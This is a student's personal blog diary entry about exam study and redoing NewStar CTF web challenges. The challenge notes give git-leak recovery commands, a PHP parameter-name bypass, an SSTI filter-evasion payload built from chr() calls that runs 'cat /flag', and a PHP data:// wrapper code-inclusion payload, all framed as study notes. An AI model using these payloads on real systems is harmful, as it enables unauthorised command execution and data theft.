2024.11.21

我就说为什么我在主页看不到自己的文章,原来默认只有随笔才在主页显示啊,所以今天写的是随笔啦
我的博客已经有三天啦,但是还没有正式的发过一篇文章哈哈哈哈哈哈哈,等过两天工作室分享会的时候发吧嘻嘻

今天做了什么呢

  1. 两篇阅读理解,两篇都错了两个,坚持吧,这次四级一定一定一定一定要过啊啊啊啊啊,保佑我
  2. 把昨天的概率论订正完啦,又写了一半,不会的确实海油很多啊啊啊啊,加油!!!! 一定一定一定一定要取得好的成绩
  3. 今天晚上呢,复现了newStar
  • git泄露
    git log 查看提交历史
    git stash list 查看Stash
    git stach pop 将之前存储的内容重新恢复到工作区
  • 传参
    如果直接传参 NewStar_CTF.2024=Welcome%0A 会发现并没有用。这是由 NewStar_CTF.2024 中的特殊字符 . 引起的,PHP 默认会将其解析为 NewStar_CTF_2024. 在 PHP 7 中,可以使用 [ 字符的非正确替换漏洞。当传入的参数名中出现 [ 且之后没有 ] 时,PHP 会将 [ 替换为 _,但此之后就不会继续替换后面的特殊字符了因此,GET 传参 NewStar[CTF.2024=Welcome%0a 即可
  • SSTI过滤了所有字母
    可以使用全角英文和 chr() 字符拼接(或八进制)绕过
    _import_(chr(111)+chr(115)).system(chr(99)+chr(97)+chr(116)+chr(32)+chr(47)+chr(102)+chr(108)+chr(97)+chr(103))
  • php伪协议中的data://
    1、data://text/plain
    url?file=data://text/plain,
    2、data://text/plain;base64
    url?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
posted @ 2024-11-21 21:11  z0u  阅读(56)  评论(0)    收藏  举报